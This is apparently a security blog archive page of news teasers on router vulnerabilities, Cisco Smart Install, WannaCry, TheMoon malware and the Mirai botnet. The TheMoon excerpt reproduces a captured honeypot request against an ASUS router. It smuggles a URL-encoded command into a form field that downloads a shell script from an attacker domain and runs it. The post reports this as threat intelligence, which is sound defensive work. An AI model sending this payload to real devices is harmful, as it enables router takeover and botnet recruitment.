Category Archives: Security News

D-Link DIR-850L – Unauthenticated OS Command Execution Vulnerability RCE Router

D-Link DIR-850L suffers from a serious vulnerability allowing for OS command execution. If you have this version of D-Link, it is highly recommended that you upgrade the firmware immediately and firewall off all access to this device. This will not help you prevent insider threats but will stop the masses from locating and owning your… Read More »


HUGE VULNERABILITY Remote Code Execution Possible with Cisco Smart Install Protocol Misuse

Technical Details Smart Install is a plug-and-play configuration and image-management feature that provides zero-touch deployment for new switches. The Smart Install feature incorporates no authentication by design. SmartInstall also has mechanisms in place for subsequent Cisco IOS Software and configuration upgrades on groups of switches, using a single command line interface (CLI) and switch… Read More »


Wcry WannaCry WCry Ransomware Malware ETERNALBLUE/MS17-010 Worm is dead or is it? – active new IOCs Domain Names/IPs

Ransomware is nothing new; since 2012 it has been wreaking havoc on the world. The TTPs for delivering and infecting victims have changed over the years, but the end goal remains the same: give me your money or you’ll never see your files again. Some of the first ransomware campaigns used mechanisms such as exploit… Read More »


New Linux Backdoor found in the wild TheMoon family of malware ASUS Router NTTPD Vulnerability

New Linux Backdoor found in the wild on one of our honeypots – This bot belongs to the TheMoon family of malware. The vulnerable ASUS router will download and execute the binary file .nttpd from the attacker-controlled website.

POST /hndUnblock.cgi HTTP/1.0 \r\nAccept: */*\r\n Host: 81.171.12.232\r\n User-Agent: Wget(linux)\r\n Content-Length: 414\r\n Content-Type: application/x-www-form-urlencoded submit_button=&change_action=&action=&commit=&ttcp_num=2&ttcp_size=2&ttcp_ip=-h `%63%64%20%2F%74%6D%70%3B%72%6D%20%2D%66%20%6E%6D%6C%74%31%2E%73%68%3B%77%67%65%74%20%2D%4F%20%6E%6D%6C%74%31%2E%73%68%20%68%74%74%70%3A%2F%2F%66%6C%6F%77%65%72%74%6F%77%65%72%73%62%6C%61%62%6C%61%2E%74%6F%70%2F%6E%6D%6C%74%31%2E%73%68%3B%63%68%6D%6F%64%20%2B%78%20%6E%6D%6C%74%31%2E%73%68%3B%2E%2F%6E%6D%6C%74%31%2E%73%68`&StartEPI=1′

https://virustotal.com/en/file/b963223d3f39884ebed3e647390e55d8de86c7e3c5daaae6509379a6fc3ba97e/analysis/1489518585/

Antivirus… Read More »


Mirai Internet of Things IoT DDoS sets record 600+ GB/Sec and your refrigerator could have been one of the attackers!

What is the Internet of Things (IoT)? In today’s technological expansion everything seems to be connected to the Internet. For instance, in my own home I have my refrigerator, thermostat, video cameras, tablets, cell phone, TV, Xbox, DirecTV box, printer, security system, laptops, servers, workstations, Ethernet tap, a switch and a router all connected… Read More »
